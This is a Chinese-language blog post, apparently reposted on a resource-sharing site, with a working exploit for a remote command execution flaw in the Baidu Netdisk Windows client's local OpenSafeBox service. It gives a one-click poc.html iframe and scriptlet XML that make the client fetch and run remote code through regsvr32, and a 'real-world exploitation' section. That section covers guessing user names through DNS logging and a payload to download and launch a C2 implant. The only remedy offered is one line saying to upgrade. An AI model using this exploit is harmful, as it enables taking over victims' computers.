本文由 资源共享网 – admin 发布,转载请注明出处,如有问题请联系我们![免费]百度网盘客户端YunDetectService服务 OpenSafeBox 远程命令执行漏洞

收藏

漏洞介绍

百度网盘Windows客户端存在远程命令执行漏洞,Windows客户端安装后,后台程序YunDetectService.exe将监听本地10000端⼝。该后台程序为开机⾃启动;10000端口用来接收web请求(版本7.50.0.130之前处理HTTP,往后版本则是HTTPS),以method=xxxx的形式传递参数,实现不同的功能。其中的method可接收的参数主要包括:GetVersion,GetPcCode,DownloadShareItems,DownloadSelfOwnItems,OpenSafeBox等。其中OpenSafeBox方法存在远程命令执行漏洞,攻击者可以利用该漏洞执行任意命令,导致系统失陷。

图片

漏洞影响版本

Baidunetdisk≤7.59.5.104

FOFA

    /

关于漏洞的分析网上已经满天飞,这里仅作漏洞复现及实战利用

漏洞复现

查看当前版本

https://127.0.0.1:10000/?method=GetVersion

图片

1click执行系统命令

通过诱导目标访问我们制作好的页面远程加载我们构造的攻击XML造成系统命令执行

http://192.168.1.1/poc.html

图片
图片

poc.html

<html>
    <iframe width="1px"height="1px"referrerpolicy="no-referrer"src='https://127.0.0.1:10000/?method=OpenSafeBox&uk=a%20-install%20regdll%20%22C:\\windows\\system32\\scrobj.dll\%22%20/u%20/i:http://[payload监听地址]/poc.xml%20\%22\\..\\..\\..\\..\\..\\..\\..\\Users\[实际用户名]\AppData\Roaming\baidu\BaiduNetdisk'>
    </ifram>
</html>

poc.xml

<?XML version="1.0"?>
<scriptlet>
    <registration progid="poc" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
        <script language="JScript">
            <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c calc.exe");
            ]]>
        </script>
    </registration>
</scriptlet>

实战利用

查看版本

https://1.1.1.1/?method=GetVersion

图片

DNSLOG探测

通过DNSLOG探测确认可以成功远程加载恶意XML。
这里[实际用户名]在实战中可以通过爆破(利用dnslog探测)得到,一般很多默认Administrator、admin等等。

https://1.1.1.1/?method=OpenSafeBox&uk=a%20-install%20regdll%20%22C:\\windows\\system32\\scrobj.dll\%22%20/u%20/i:http://[payload服务器地址]/poc.xml%20\%22\\..\\..\\..\\..\\..\\..\\..\\Users\[实际用户名]\AppData\Roaming\baidu\BaiduNetdisk

图片
图片

上线C2

通过修改XML文件中执行命令为C2文件执行命令获取系统权限。

图片
图片
图片

RCE.xml

<?XML version="1.0"?>
<scriptlet>
    <registration progid="poc" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
        <script language="JScript">
            <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c [C2下载并执行命令]");
            ]]>
        </script>
    </registration>
</scriptlet>

修复建议

升级最新版本
https://pan.baidu.com/


评论(0条)

请登录后评论
admin

admin

0

0

0

( 此人很懒并没有留下什么~~ )

首页

栏目

搜索

会员